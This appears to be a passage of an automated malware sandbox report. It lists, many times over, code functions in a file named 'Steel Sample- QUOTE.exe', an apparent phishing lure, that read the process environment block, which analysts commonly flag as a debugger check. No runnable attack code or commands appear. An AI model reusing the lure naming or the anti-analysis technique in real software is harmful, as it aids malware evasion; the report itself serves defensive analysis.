Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]	6_2_3523F7BA
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]	6_2_3523F7BA
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]	6_2_3523F7BA
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]	6_2_3523F7BA
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]	6_2_3523F7BA
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]	6_2_3523F7BA
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]	6_2_3523F7BA
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]	6_2_3523F7BA
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352FD7B0 mov eax, dword ptr fs:[00000030h]	6_2_352FD7B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352FD7B0 mov eax, dword ptr fs:[00000030h]	6_2_352FD7B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352FF78A mov eax, dword ptr fs:[00000030h]	6_2_352FF78A
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524D7E0 mov ecx, dword ptr fs:[00000030h]	6_2_3524D7E0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352457C0 mov eax, dword ptr fs:[00000030h]	6_2_352457C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352457C0 mov eax, dword ptr fs:[00000030h]	6_2_352457C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352457C0 mov eax, dword ptr fs:[00000030h]	6_2_352457C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]	6_2_3523F626
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]	6_2_3523F626
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]	6_2_3523F626
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]	6_2_3523F626
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]	6_2_3523F626
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]	6_2_3523F626
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]	6_2_3523F626
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]	6_2_3523F626
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]	6_2_3523F626
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35315636 mov eax, dword ptr fs:[00000030h]	6_2_35315636
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35271607 mov eax, dword ptr fs:[00000030h]	6_2_35271607
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3527F603 mov eax, dword ptr fs:[00000030h]	6_2_3527F603
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35243616 mov eax, dword ptr fs:[00000030h]	6_2_35243616
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35243616 mov eax, dword ptr fs:[00000030h]	6_2_35243616
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35279660 mov eax, dword ptr fs:[00000030h]	6_2_35279660
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35279660 mov eax, dword ptr fs:[00000030h]	6_2_35279660
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352DD660 mov eax, dword ptr fs:[00000030h]	6_2_352DD660
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523D6AA mov eax, dword ptr fs:[00000030h]	6_2_3523D6AA
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523D6AA mov eax, dword ptr fs:[00000030h]	6_2_3523D6AA
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352376B2 mov eax, dword ptr fs:[00000030h]	6_2_352376B2
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352376B2 mov eax, dword ptr fs:[00000030h]	6_2_352376B2
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352376B2 mov eax, dword ptr fs:[00000030h]	6_2_352376B2
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352C368C mov eax, dword ptr fs:[00000030h]	6_2_352C368C
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352C368C mov eax, dword ptr fs:[00000030h]	6_2_352C368C
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352C368C mov eax, dword ptr fs:[00000030h]	6_2_352C368C
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352C368C mov eax, dword ptr fs:[00000030h]	6_2_352C368C
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]	6_2_352D36EE
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]	6_2_352D36EE
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]	6_2_352D36EE
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]	6_2_352D36EE
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]	6_2_352D36EE
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]	6_2_352D36EE
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526D6E0 mov eax, dword ptr fs:[00000030h]	6_2_3526D6E0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526D6E0 mov eax, dword ptr fs:[00000030h]	6_2_3526D6E0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352FD6F0 mov eax, dword ptr fs:[00000030h]	6_2_352FD6F0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]	6_2_3524B6C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]	6_2_3524B6C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]	6_2_3524B6C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]	6_2_3524B6C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]	6_2_3524B6C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]	6_2_3524B6C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352FF6C7 mov eax, dword ptr fs:[00000030h]	6_2_352FF6C7
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352716CF mov eax, dword ptr fs:[00000030h]	6_2_352716CF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353016CC mov eax, dword ptr fs:[00000030h]	6_2_353016CC
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353016CC mov eax, dword ptr fs:[00000030h]	6_2_353016CC
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353016CC mov eax, dword ptr fs:[00000030h]	6_2_353016CC
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353016CC mov eax, dword ptr fs:[00000030h]	6_2_353016CC
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35317120 mov eax, dword ptr fs:[00000030h]	6_2_35317120
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35241131 mov eax, dword ptr fs:[00000030h]	6_2_35241131
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35241131 mov eax, dword ptr fs:[00000030h]	6_2_35241131
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523B136 mov eax, dword ptr fs:[00000030h]	6_2_3523B136
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523B136 mov eax, dword ptr fs:[00000030h]	6_2_3523B136
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523B136 mov eax, dword ptr fs:[00000030h]	6_2_3523B136
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523B136 mov eax, dword ptr fs:[00000030h]	6_2_3523B136
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352D9179 mov eax, dword ptr fs:[00000030h]	6_2_352D9179
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35315152 mov eax, dword ptr fs:[00000030h]	6_2_35315152
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35239148 mov eax, dword ptr fs:[00000030h]	6_2_35239148
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35239148 mov eax, dword ptr fs:[00000030h]	6_2_35239148
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35239148 mov eax, dword ptr fs:[00000030h]	6_2_35239148
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35239148 mov eax, dword ptr fs:[00000030h]	6_2_35239148
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352D3140 mov eax, dword ptr fs:[00000030h]	6_2_352D3140
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352D3140 mov eax, dword ptr fs:[00000030h]	6_2_352D3140
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352D3140 mov eax, dword ptr fs:[00000030h]	6_2_352D3140
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35247152 mov eax, dword ptr fs:[00000030h]	6_2_35247152
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352F11A4 mov eax, dword ptr fs:[00000030h]	6_2_352F11A4
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352F11A4 mov eax, dword ptr fs:[00000030h]	6_2_352F11A4
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352F11A4 mov eax, dword ptr fs:[00000030h]	6_2_352F11A4
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352F11A4 mov eax, dword ptr fs:[00000030h]	6_2_352F11A4
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3525B1B0 mov eax, dword ptr fs:[00000030h]	6_2_3525B1B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352F5180 mov eax, dword ptr fs:[00000030h]	6_2_352F5180
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352F5180 mov eax, dword ptr fs:[00000030h]	6_2_352F5180
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35297190 mov eax, dword ptr fs:[00000030h]	6_2_35297190
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]	6_2_352651EF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]	6_2_352651EF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]	6_2_352651EF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]	6_2_352651EF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]	6_2_352651EF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]	6_2_352651EF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]	6_2_352651EF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]	6_2_352651EF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]	6_2_352651EF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]	6_2_352651EF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]	6_2_352651EF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]	6_2_352651EF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]	6_2_352651EF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352451ED mov eax, dword ptr fs:[00000030h]	6_2_352451ED
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353131E1 mov eax, dword ptr fs:[00000030h]	6_2_353131E1
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352E71F9 mov esi, dword ptr fs:[00000030h]	6_2_352E71F9
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3527D1D0 mov eax, dword ptr fs:[00000030h]	6_2_3527D1D0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3527D1D0 mov ecx, dword ptr fs:[00000030h]	6_2_3527D1D0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353151CB mov eax, dword ptr fs:[00000030h]	6_2_353151CB
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3530903E mov eax, dword ptr fs:[00000030h]	6_2_3530903E
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3530903E mov eax, dword ptr fs:[00000030h]	6_2_3530903E
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3530903E mov eax, dword ptr fs:[00000030h]	6_2_3530903E
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3530903E mov eax, dword ptr fs:[00000030h]	6_2_3530903E
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352C106E mov eax, dword ptr fs:[00000030h]	6_2_352C106E
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35315060 mov eax, dword ptr fs:[00000030h]	6_2_35315060
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]	6_2_35251070
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35251070 mov ecx, dword ptr fs:[00000030h]	6_2_35251070
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]	6_2_35251070
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]	6_2_35251070
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]	6_2_35251070
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]	6_2_35251070
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]	6_2_35251070
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]	6_2_35251070
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]	6_2_35251070
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]	6_2_35251070
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]	6_2_35251070
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]	6_2_35251070
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]	6_2_35251070
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352BD070 mov ecx, dword ptr fs:[00000030h]	6_2_352BD070
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352E705E mov ebx, dword ptr fs:[00000030h]	6_2_352E705E
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352E705E mov eax, dword ptr fs:[00000030h]	6_2_352E705E
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526B052 mov eax, dword ptr fs:[00000030h]	6_2_3526B052
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352CD080 mov eax, dword ptr fs:[00000030h]	6_2_352CD080
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352CD080 mov eax, dword ptr fs:[00000030h]	6_2_352CD080
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523D08D mov eax, dword ptr fs:[00000030h]	6_2_3523D08D
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35245096 mov eax, dword ptr fs:[00000030h]	6_2_35245096
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526D090 mov eax, dword ptr fs:[00000030h]	6_2_3526D090
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526D090 mov eax, dword ptr fs:[00000030h]	6_2_3526D090
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3527909C mov eax, dword ptr fs:[00000030h]	6_2_3527909C
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352650E4 mov eax, dword ptr fs:[00000030h]	6_2_352650E4
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352650E4 mov ecx, dword ptr fs:[00000030h]	6_2_352650E4
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov ecx, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov ecx, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov ecx, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov ecx, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353150D9 mov eax, dword ptr fs:[00000030h]	6_2_353150D9
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352BD0C0 mov eax, dword ptr fs:[00000030h]	6_2_352BD0C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352BD0C0 mov eax, dword ptr fs:[00000030h]	6_2_352BD0C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352690DB mov eax, dword ptr fs:[00000030h]	6_2_352690DB
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526F32A mov eax, dword ptr fs:[00000030h]	6_2_3526F32A
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35237330 mov eax, dword ptr fs:[00000030h]	6_2_35237330
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3530132D mov eax, dword ptr fs:[00000030h]	6_2_3530132D
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3530132D mov eax, dword ptr fs:[00000030h]	6_2_3530132D
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352C930B mov eax, dword ptr fs:[00000030h]	6_2_352C930B
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352C930B mov eax, dword ptr fs:[00000030h]	6_2_352C930B
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352C930B mov eax, dword ptr fs:[00000030h]	6_2_352C930B
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352FF367 mov eax, dword ptr fs:[00000030h]	6_2_352FF367
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35247370 mov eax, dword ptr fs:[00000030h]	6_2_35247370
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35247370 mov eax, dword ptr fs:[00000030h]	6_2_35247370
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35247370 mov eax, dword ptr fs:[00000030h]	6_2_35247370
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352E3370 mov eax, dword ptr fs:[00000030h]	6_2_352E3370
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523D34C mov eax, dword ptr fs:[00000030h]	6_2_3523D34C
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523D34C mov eax, dword ptr fs:[00000030h]	6_2_3523D34C
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35239353 mov eax, dword ptr fs:[00000030h]	6_2_35239353
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35239353 mov eax, dword ptr fs:[00000030h]	6_2_35239353
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35315341 mov eax, dword ptr fs:[00000030h]	6_2_35315341
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352633A5 mov eax, dword ptr fs:[00000030h]	6_2_352633A5
